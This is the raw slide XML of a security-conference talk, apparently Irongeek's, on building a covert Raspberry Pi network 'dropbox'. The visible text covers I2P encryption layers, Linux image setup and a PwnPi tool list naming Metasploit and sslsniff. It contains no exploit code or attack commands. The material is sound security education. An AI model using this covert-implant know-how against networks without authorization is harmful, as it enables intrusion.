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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId64"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="323" r:id="rId3"/>
    <p:sldId id="329" r:id="rId4"/>
    <p:sldId id="330" r:id="rId5"/>
    <p:sldId id="331" r:id="rId6"/>
    <p:sldId id="332" r:id="rId7"/>
    <p:sldId id="334" r:id="rId8"/>
    <p:sldId id="335" r:id="rId9"/>
    <p:sldId id="336" r:id="rId10"/>
    <p:sldId id="337" r:id="rId11"/>
    <p:sldId id="338" r:id="rId12"/>
    <p:sldId id="371" r:id="rId13"/>
    <p:sldId id="411" r:id="rId14"/>
    <p:sldId id="412" r:id="rId15"/>
    <p:sldId id="369" r:id="rId16"/>
    <p:sldId id="370" r:id="rId17"/>
    <p:sldId id="372" r:id="rId18"/>
    <p:sldId id="373" r:id="rId19"/>
    <p:sldId id="374" r:id="rId20"/>
    <p:sldId id="375" r:id="rId21"/>
    <p:sldId id="376" r:id="rId22"/>
    <p:sldId id="377" r:id="rId23"/>
    <p:sldId id="378" r:id="rId24"/>
    <p:sldId id="379" r:id="rId25"/>
    <p:sldId id="380" r:id="rId26"/>
    <p:sldId id="368" r:id="rId27"/>
    <p:sldId id="360" r:id="rId28"/>
    <p:sldId id="385" r:id="rId29"/>
    <p:sldId id="386" r:id="rId30"/>
    <p:sldId id="387" r:id="rId31"/>
    <p:sldId id="388" r:id="rId32"/>
    <p:sldId id="389" r:id="rId33"/>
    <p:sldId id="390" r:id="rId34"/>
    <p:sldId id="391" r:id="rId35"/>
    <p:sldId id="392" r:id="rId36"/>
    <p:sldId id="393" r:id="rId37"/>
    <p:sldId id="404" r:id="rId38"/>
    <p:sldId id="405" r:id="rId39"/>
    <p:sldId id="406" r:id="rId40"/>
    <p:sldId id="407" r:id="rId41"/>
    <p:sldId id="408" r:id="rId42"/>
    <p:sldId id="409" r:id="rId43"/>
    <p:sldId id="410" r:id="rId44"/>
    <p:sldId id="381" r:id="rId45"/>
    <p:sldId id="382" r:id="rId46"/>
    <p:sldId id="399" r:id="rId47"/>
    <p:sldId id="383" r:id="rId48"/>
    <p:sldId id="384" r:id="rId49"/>
    <p:sldId id="400" r:id="rId50"/>
    <p:sldId id="402" r:id="rId51"/>
    <p:sldId id="401" r:id="rId52"/>
    <p:sldId id="403" r:id="rId53"/>
    <p:sldId id="394" r:id="rId54"/>
    <p:sldId id="396" r:id="rId55"/>
    <p:sldId id="395" r:id="rId56"/>
    <p:sldId id="413" r:id="rId57"/>
    <p:sldId id="365" r:id="rId58"/>
    <p:sldId id="366" r:id="rId59"/>
    <p:sldId id="367" r:id="rId60"/>
    <p:sldId id="291" r:id="rId61"/>
    <p:sldId id="328" r:id="rId6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074" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="126" d="100"/>
          <a:sy n="126"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7/14/12</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10007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7/14/12</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00275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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273234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60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61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792174-60E5-4DB5-AC24-51715D6953E0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12</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4AA76-4E64-4FDB-AC58-24FB80A2D37D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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437F-8864-4D42-B820-741711E368E3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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71E70E-7A0F-4790-A459-AE20FEF9162B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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88625-263C-43A0-8C3F-63AC0FAF8029}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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362503-9846-445D-ABB5-954A60CFB6F1}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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B8F07D3-1943-4BCA-9533-0777C2BA2128}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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30FC56-1518-455F-9DAB-57F008E3559A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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ED8C2D-821E-49DE-A890-7FF4495653EB}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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9FFAA8E-3019-4854-8C02-F09B944CC9F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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18707-7EBB-4841-9E9F-0B1455B824F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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F9788DC-0CC9-40BC-92D8-795794D78067}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/14/12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8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488113"/>
            <a:ext cx="2098675" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://Irongeek.com</a:t>
            </a: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i2p2.de/" TargetMode="External"/><Relationship Id="rId4"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launchpad.net/win32-image-writer/+download" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.raspberrypi.org/archives/1435" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gparted.sourceforge.net/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://elinux.org/RPi_Easy_SD_Card_Setu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wnpi.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isdpodcast.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.derbycon.com/" TargetMode="External"/><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3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andonhutchinson.com/Passwordless_ssh_logins.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.brandonhutchinson.com/ssh_tunnelling.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mazon.com/AT-Laptop-Dock-Motorola-ATRIX/dp/B004M17D62" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sparkfun.com/products/9614" TargetMode="External"/><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rpidock.blogspot.com/2012/05/raspberry-pi-and-motorola-lapdock.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e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inux.org/RPi_Low-level_peripherals" TargetMode="External"/><Relationship Id="rId3"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http://elinux.org/RPi_Low-level_peripherals" TargetMode="External"/><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arkfun.com/products/8745" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.jpg"/></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47.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://elinux.org/RPi_Low-level_peripherals" TargetMode="External"/><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beagleboard.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://amzn.to/qJUu4P" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.raspberrypi.org/"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47.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://elinux.org/RPi_Low-level_peripherals" TargetMode="External"/><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Wireless_mesh_network" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cuwin.net/node/325" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nytimes.com/2011/06/12/world/12internet.html?_r=2&amp;pagewanted=all"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18.gif"/><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linux.org/R-Pi_Hub" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=security/raspberry-pi-recipes" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.raspberrypi.or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ongeek.com/i.php?page=security/raspberry-pi-i2p-svartkast" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cryptoanarchy.org/wiki/Blackthrow"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i2p2.de/how_threatmodel.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=videos/aide-winter-2011" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=security/darknets-i2p-identifying-hidden-servers" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=videos/identifying-the-true-ip-network-identity-of-i2p-service-hosts-talk-adrian-crenshaw-blackhat-dc-2011" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=videos/sshdynamicportforwarding" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freehaven.net/anonbib/"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iconlibrary.sourceforge.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hyperlink" Target="http://www.derbycon.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.louisvilleinfosec.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://skydogcon.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hack3rcon.org/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.outerz0ne.org" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phreaknic.info/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://notacon.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effectLst/>
              </a:rPr>
              <a:t>Dingleberry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Pi:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Raspberry Pi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dropbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3331698"/>
            <a:ext cx="8763000" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adrian Crenshaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="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I2P Encryption Layers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>EIGamal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SessionTag+AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> from A to H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Private Key AES from A to D and E to H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Diffie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>–Hellman/Station-To-Station protocol + AES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734" y="2895600"/>
            <a:ext cx="6160532" cy="308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89456" y="6096000"/>
            <a:ext cx="3429208" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://www.i2p2.de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DK5E96P\MC9002461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548" y="762000"/>
            <a:ext cx="119462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5654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Getting Linux on The Raspberry Pi</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5267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are easy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1600200"/>
            <a:ext cx="9067800" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>your poison </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Squeeze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Wheezy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, Arch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Raspbian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://elinux.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>RPi_Easy_SD_Card_Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> that comes with most *nix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Win32DiskImager GUI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://launchpad.net/win32-image-writer/+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I’m using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Wheezy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Beta:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.raspberrypi.org/archives/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>1435</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>GParted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to resize to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>full SD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>gparted.sourceforge.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2472404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GParted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9338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048000"/>
            <a:ext cx="5348315" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3128611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Mention: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PwnPi</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a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://www.pwnpi.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ncludes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dnstracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lynis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcptraceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ngrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sslsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dnswalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dmitry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-scan, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>darkstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>swaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>arping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcpflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
